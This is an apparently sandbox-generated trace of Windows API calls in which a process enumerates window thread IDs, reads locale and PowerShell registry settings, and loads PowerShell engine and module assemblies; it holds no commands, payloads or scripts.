	[0631.264] GetWindowThreadProcessId (in: hWnd=0x103f0, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xfd0
	[0631.264] GetWindowThreadProcessId (in: hWnd=0x1039a, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xf88
	[0631.264] GetWindowThreadProcessId (in: hWnd=0x1038a, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xf84
	[0631.264] GetWindowThreadProcessId (in: hWnd=0x10382, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xf80
	[0631.264] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xde0
	[0631.265] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xddc
	[0631.265] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xdd8
	[0631.265] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xd34
	[0631.265] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xd10
	[0631.265] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xd0c
	[0631.265] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xc9c
	[0631.265] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xc74
	[0631.265] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xc1c
	[0631.265] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xc08
	[0631.265] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xabc
	[0631.266] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x24c
	[0631.266] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xbb0
	[0631.266] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xbfc
	[0631.266] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xb10
	[0631.266] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x374
	[0631.266] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x368
	[0631.266] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xb28
	[0631.266] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xae8
	[0631.266] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xb14
	[0631.270] WerSetFlags () returned 0x0
	[0633.982] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0633.983] CoTaskMemFree (pv=0x0) 
	[0633.984] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1eda28, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1eda20 | out: pulNumLanguages=0x1eda28, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1eda20) returned 1
	[0633.984] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1eda28, pwszLanguagesBuffer=0x2d55328, pcchLanguagesBuffer=0x1eda20 | out: pulNumLanguages=0x1eda28, pwszLanguagesBuffer=0x2d55328, pcchLanguagesBuffer=0x1eda20) returned 1
	[0633.990] CoTaskMemAlloc (cb=0x24) returned 0x4546a0
	[0633.990] GetUserDefaultLocaleName (in: lpLocaleName=0x4546a0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0633.991] CoTaskMemFree (pv=0x4546a0) 
	[0634.016] CoTaskMemAlloc (cb=0x104) returned 0x41ebe0
	[0634.016] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ebe0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0634.016] CoTaskMemFree (pv=0x41ebe0) 
	[0636.014] CoTaskMemAlloc (cb=0x104) returned 0x41ebe0
	[0636.014] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ebe0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0636.015] CoTaskMemFree (pv=0x41ebe0) 
	[0636.017] CoTaskMemAlloc (cb=0x104) returned 0x41ebe0
	[0636.017] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ebe0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0636.017] CoTaskMemFree (pv=0x41ebe0) 
	[0636.028] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0636.028] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0636.028] SetErrorMode (uMode=0x1) returned 0x1
	[0636.029] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1ed6a0 | out: lpFileInformation=0x1ed6a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0636.029] SetErrorMode (uMode=0x1) returned 0x1
	[0636.029] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1ed910 | out: lpdwHandle=0x1ed910) returned 0x94c
	[0636.030] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d58bb8 | out: lpData=0x2d58bb8) returned 1
	[0636.031] VerQueryValueW (in: pBlock=0x2d58bb8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1ed888, puLen=0x1ed880 | out: lplpBuffer=0x1ed888*=0x2d58c54, puLen=0x1ed880) returned 1
	[0636.031] VerQueryValueW (in: pBlock=0x2d58bb8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1ed7f8, puLen=0x1ed7f0 | out: lplpBuffer=0x1ed7f8*=0x2d58d30, puLen=0x1ed7f0) returned 1
	[0636.031] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0636.031] CoTaskMemAlloc (cb=0x2e) returned 0x4242e0
	[0636.032] lstrcpyW (in: lpString1=0x4242e0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0636.032] CoTaskMemFree (pv=0x4242e0) 
	[0636.032] VerQueryValueW (in: pBlock=0x2d58bb8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1ed7f8, puLen=0x1ed7f0 | out: lplpBuffer=0x1ed7f8*=0x2d58d84, puLen=0x1ed7f0) returned 1
	[0636.032] lstrlenW (lpString="System.Management.Automation") returned 28
	[0636.032] CoTaskMemAlloc (cb=0x3c) returned 0x461140
	[0636.032] lstrcpyW (in: lpString1=0x461140, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0636.032] CoTaskMemFree (pv=0x461140) 
	[0636.032] VerQueryValueW (in: pBlock=0x2d58bb8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1ed7f8, puLen=0x1ed7f0 | out: lplpBuffer=0x1ed7f8*=0x2d58de0, puLen=0x1ed7f0) returned 1
	[0636.032] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0636.032] CoTaskMemAlloc (cb=0x20) returned 0x454910
	[0636.032] lstrcpyW (in: lpString1=0x454910, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0636.032] CoTaskMemFree (pv=0x454910) 
	[0636.032] VerQueryValueW (in: pBlock=0x2d58bb8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1ed7f8, puLen=0x1ed7f0 | out: lplpBuffer=0x1ed7f8*=0x2d58e20, puLen=0x1ed7f0) returned 1
	[0636.032] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0636.032] CoTaskMemAlloc (cb=0x44) returned 0x461140
	[0636.032] lstrcpyW (in: lpString1=0x461140, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0636.032] CoTaskMemFree (pv=0x461140) 
	[0636.032] VerQueryValueW (in: pBlock=0x2d58bb8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1ed7f8, puLen=0x1ed7f0 | out: lplpBuffer=0x1ed7f8*=0x2d58e88, puLen=0x1ed7f0) returned 1
	[0636.032] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0636.032] CoTaskMemAlloc (cb=0x76) returned 0x401870
	[0636.032] lstrcpyW (in: lpString1=0x401870, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0636.032] CoTaskMemFree (pv=0x401870) 
	[0636.033] VerQueryValueW (in: pBlock=0x2d58bb8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1ed7f8, puLen=0x1ed7f0 | out: lplpBuffer=0x1ed7f8*=0x2d58f24, puLen=0x1ed7f0) returned 1
	[0636.033] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0636.033] CoTaskMemAlloc (cb=0x44) returned 0x461140
	[0636.033] lstrcpyW (in: lpString1=0x461140, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0636.033] CoTaskMemFree (pv=0x461140) 
	[0636.033] VerQueryValueW (in: pBlock=0x2d58bb8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1ed7f8, puLen=0x1ed7f0 | out: lplpBuffer=0x1ed7f8*=0x2d58f88, puLen=0x1ed7f0) returned 1
	[0636.033] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0636.033] CoTaskMemAlloc (cb=0x58) returned 0x3dcd40
	[0636.033] lstrcpyW (in: lpString1=0x3dcd40, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0636.033] CoTaskMemFree (pv=0x3dcd40) 
	[0636.033] VerQueryValueW (in: pBlock=0x2d58bb8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1ed7f8, puLen=0x1ed7f0 | out: lplpBuffer=0x1ed7f8*=0x2d59004, puLen=0x1ed7f0) returned 1
	[0636.033] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0636.033] CoTaskMemAlloc (cb=0x20) returned 0x454910
	[0636.033] lstrcpyW (in: lpString1=0x454910, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0636.033] CoTaskMemFree (pv=0x454910) 
	[0636.033] VerQueryValueW (in: pBlock=0x2d58bb8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1ed7f8, puLen=0x1ed7f0 | out: lplpBuffer=0x1ed7f8*=0x2d58cac, puLen=0x1ed7f0) returned 1
	[0636.033] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0636.033] CoTaskMemAlloc (cb=0x66) returned 0x44f450
	[0636.033] lstrcpyW (in: lpString1=0x44f450, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0636.033] CoTaskMemFree (pv=0x44f450) 
	[0636.033] VerQueryValueW (in: pBlock=0x2d58bb8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1ed7f8, puLen=0x1ed7f0 | out: lplpBuffer=0x1ed7f8*=0x0, puLen=0x1ed7f0) returned 0
	[0636.033] VerQueryValueW (in: pBlock=0x2d58bb8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1ed7f8, puLen=0x1ed7f0 | out: lplpBuffer=0x1ed7f8*=0x0, puLen=0x1ed7f0) returned 0
	[0636.034] VerQueryValueW (in: pBlock=0x2d58bb8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1ed7f8, puLen=0x1ed7f0 | out: lplpBuffer=0x1ed7f8*=0x0, puLen=0x1ed7f0) returned 0
	[0636.034] VerQueryValueW (in: pBlock=0x2d58bb8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1ed7c8, puLen=0x1ed7c0 | out: lplpBuffer=0x1ed7c8*=0x2d58c54, puLen=0x1ed7c0) returned 1
	[0636.034] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0636.034] VerLanguageNameW (in: wLang=0x0, szLang=0x403ff0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0636.034] CoTaskMemFree (pv=0x403ff0) 
	[0636.034] VerQueryValueW (in: pBlock=0x2d58bb8, lpSubBlock="\\", lplpBuffer=0x1ed818, puLen=0x1ed810 | out: lplpBuffer=0x1ed818*=0x2d58be0, puLen=0x1ed810) returned 1
	[0636.043] CoTaskMemAlloc (cb=0x104) returned 0x41ebe0
	[0636.043] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ebe0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0636.043] CoTaskMemFree (pv=0x41ebe0) 
	[0637.931] CoTaskMemAlloc (cb=0x104) returned 0x41ebe0
	[0637.931] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ebe0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0637.931] CoTaskMemFree (pv=0x41ebe0) 
	[0637.935] lstrlenW (lpString="䅁") returned 1
	[0637.945] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed6e8 | out: phkResult=0x1ed6e8*=0x1c0) returned 0x0
	[0637.946] RegOpenKeyExW (in: hKey=0x1c0, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed6d8 | out: phkResult=0x1ed6d8*=0x300) returned 0x0
	[0637.946] RegOpenKeyExW (in: hKey=0x300, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed768 | out: phkResult=0x1ed768*=0x304) returned 0x0
	[0637.951] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed6ac, lpData=0x0, lpcbData=0x1ed6a8*=0x0 | out: lpType=0x1ed6ac*=0x1, lpData=0x0, lpcbData=0x1ed6a8*=0x56) returned 0x0
	[0637.952] CoTaskMemAlloc (cb=0x5a) returned 0x44f3e0
	[0637.952] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed67c, lpData=0x44f3e0, lpcbData=0x1ed678*=0x56 | out: lpType=0x1ed67c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ed678*=0x56) returned 0x0
	[0637.952] CoTaskMemFree (pv=0x44f3e0) 
	[0637.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0637.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0639.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0640.006] CoTaskMemAlloc (cb=0x104) returned 0x41ebe0
	[0640.006] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ebe0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0640.006] CoTaskMemFree (pv=0x41ebe0) 
	[0650.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ed2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0650.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ed2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0654.119] CoTaskMemAlloc (cb=0x104) returned 0x41ecf0
	[0654.119] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ecf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0654.119] CoTaskMemFree (pv=0x41ecf0) 
	[0654.120] CoTaskMemAlloc (cb=0x104) returned 0x41ecf0
	[0654.120] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ecf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0654.120] CoTaskMemFree (pv=0x41ecf0) 
	[0655.655] CoTaskMemAlloc (cb=0x104) returned 0x41ecf0
	[0655.655] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ecf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0655.655] CoTaskMemFree (pv=0x41ecf0) 
	[0655.657] CoTaskMemAlloc (cb=0x104) returned 0x41ecf0
	[0655.657] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ecf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0655.657] CoTaskMemFree (pv=0x41ecf0) 
	[0655.658] CoTaskMemAlloc (cb=0x104) returned 0x41ecf0
	[0655.658] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ecf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0655.658] CoTaskMemFree (pv=0x41ecf0) 
	[0660.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ed2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0660.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ed2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0662.244] CoTaskMemAlloc (cb=0x104) returned 0x41ecf0
	[0662.244] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ecf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0662.244] CoTaskMemFree (pv=0x41ecf0) 
	[0662.247] CoTaskMemAlloc (cb=0x104) returned 0x41ecf0
	[0662.247] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ecf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0662.247] CoTaskMemFree (pv=0x41ecf0) 
	[0663.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0663.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0677.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1ed2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0677.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1ed2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0679.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0679.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0685.142] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1ed2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0685.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1ed2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0695.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ed2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0695.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ed2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0703.232] CoTaskMemAlloc (cb=0x104) returned 0x41ef10
	[0703.232] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ef10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0703.233] CoTaskMemFree (pv=0x41ef10) 
	[0703.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
